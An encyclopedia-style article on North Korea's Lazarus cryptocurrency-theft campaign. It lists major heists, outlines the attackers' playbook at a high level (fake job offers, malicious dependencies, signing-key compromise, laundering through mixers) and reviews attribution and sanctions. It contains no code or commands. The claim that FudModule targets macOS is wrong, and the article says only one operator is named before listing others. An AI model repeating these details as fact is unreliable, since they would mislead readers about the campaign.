Lazarus cryptocurrency-theft programme

The Lazarus cryptocurrency-theft programme is a sustained North Korean state cybercrime operation that has, since approximately 2017, targeted cryptocurrency exchanges, custody providers, and DeFi protocols as a strategic sanctions-evasion mechanism. Cumulative estimated proceeds — per U.N. Panel of Experts on DPRK sanctions, U.S. Treasury, Chainalysis, and Elliptic — exceed $5 billion across hundreds of attributed operations.

It is the most operationally successful state cybercrime programme in any public attribution and a primary funding source for the North Korean weapons programmes that international sanctions are intended to constrain.

Strategic context

North Korea operates under one of the most comprehensive international sanctions regimes in history. Conventional banking access is heavily restricted; foreign-currency revenue is constrained; access to specialised technology for weapons programmes is formally prohibited. Cryptocurrency theft has become a primary workaround, leveraging:

• Pseudo-anonymous on-chain settlement that does not require conventional banking relationships.
• Cross-border movement without requiring physical movement of value.
• Conversion options through non-cooperating jurisdictions (laundering through Russian, Iranian, and certain Southeast Asian crypto-OTC infrastructure).
• State-scale operational capacity to target sophisticated victims that ordinary criminal operators cannot.

The U.N. Panel of Experts has estimated North Korean crypto-theft proceeds at $3+ billion through 2023 and growing significantly. The 2024–2025 period (with Bybit alone at $1.5B) has substantially increased the cumulative total.

Component incidents

Exchange / custody heists

• Coincheck (2018) — $530M (NEM); single-signature hot wallet
• Atomic Wallet (2023) — ~$100M; multi-asset wallet client compromise
• WazirX (2024) — ~$230M; multi-signature compromise of Indian exchange
• Bybit (2025) — ~$1.5B (current largest crypto theft in history); Safe{Wallet} front-end compromise

Bridge / DeFi heists

• Ronin Bridge (2022) — $625M; 5-of-9 validator quorum compromise
• Harmony Horizon Bridge (2022) — $100M; multi-signature compromise
• Stake.com (2023) — $41M; signing-key compromise

Earlier banking-related theft (Lazarus / APT38 lineage)

• Bangladesh Bank SWIFT (2016) — $81M; pre-cryptocurrency-era operation showcasing the same operator-targeting methodology

Operational template

Across years and dozens of operations, the Lazarus crypto-theft playbook has been notably consistent:

1. Target identification via LinkedIn / GitHub to identify engineers at exchanges, custody providers, and DeFi protocols.
2. Spearphishing via fake job offers — typically remote roles with attractive salaries — to lure engineers into video interviews and "coding challenges."
3. Malicious dependencies or interview tooling delivered during the assessment phase, dropping custom backdoors (AppleJeus, the FudModule rootkit on macOS) on engineering laptops.
4. Privileged access escalation to signing keys, wallet infrastructure, or smart-contract upgrade keys.
5. Theft via legitimately-signed transactions — making blockchain forensic recovery harder than for protocol exploits.
6. Laundering via Tornado Cash (sanctioned 2022), eXch (sanctioned 2025), Sinbad (sanctioned 2023), cross-chain bridges, and Iranian / Russian OTC desks.

The infrastructure-supplier compromise variant (Bybit / Safe{Wallet}) is the most recent evolution: compromising a vendor used by many exchanges, rather than the exchanges directly, multiplies the operational leverage of each pre-positioning effort.

Attribution

The U.N. Panel of Experts on DPRK sanctions has formally attributed many of the operations in this campaign. U.S. Treasury OFAC has sanctioned multiple specific addresses and one mixer (Tornado Cash, August 2022) explicitly citing Lazarus laundering activity.

Park Jin Hyok — the Lazarus operator indicted in 2018 for the Sony Pictures attack, Bangladesh Bank heist, and WannaCry — is the only individual publicly named for the broader Lazarus operational programme. Subsequent DOJ indictments have named additional Lazarus operators for crypto-specific operations (Jon Chang Hyok, Kim Il, others in 2021), but the principal architects remain in North Korea and beyond extradition reach.

Why it matters

The Lazarus crypto-theft programme established:

• That state cybercrime is a viable sanctions-evasion strategy at significant scale. North Korea has, per public estimates, financed a meaningful share of its weapons programmes through crypto theft.
• That decentralised cryptocurrency infrastructure is not, by virtue of decentralisation, immune to state-targeted theft. The most concentrated points — exchanges, custodians, bridges, and the vendors supplying them — are conventional targets exposed to conventional attacks.
• That infrastructure-supplier compromise is the highest-leverage evolution of the playbook. The Bybit / Safe operation demonstrated that one supplier compromise can enable theft from any of the supplier's customers — a scaling property absent from direct-target operations.
• That disruption of crypto laundering infrastructure (Tornado Cash, eXch, Sinbad sanctions) is a viable but partial counter-measure. Each sanctioned service was rapidly replaced by alternatives; the laundering ecosystem has substantial redundancy.

The operation remains active and is widely expected to continue increasing in scale and sophistication. Western policy responses — including U.S. Treasury sanctions on specific addresses, OFAC enforcement against U.S.-based crypto businesses that interact with sanctioned wallets, and continuing law-enforcement engagement with cooperating jurisdictions — have measurably impaired but not stopped the campaign.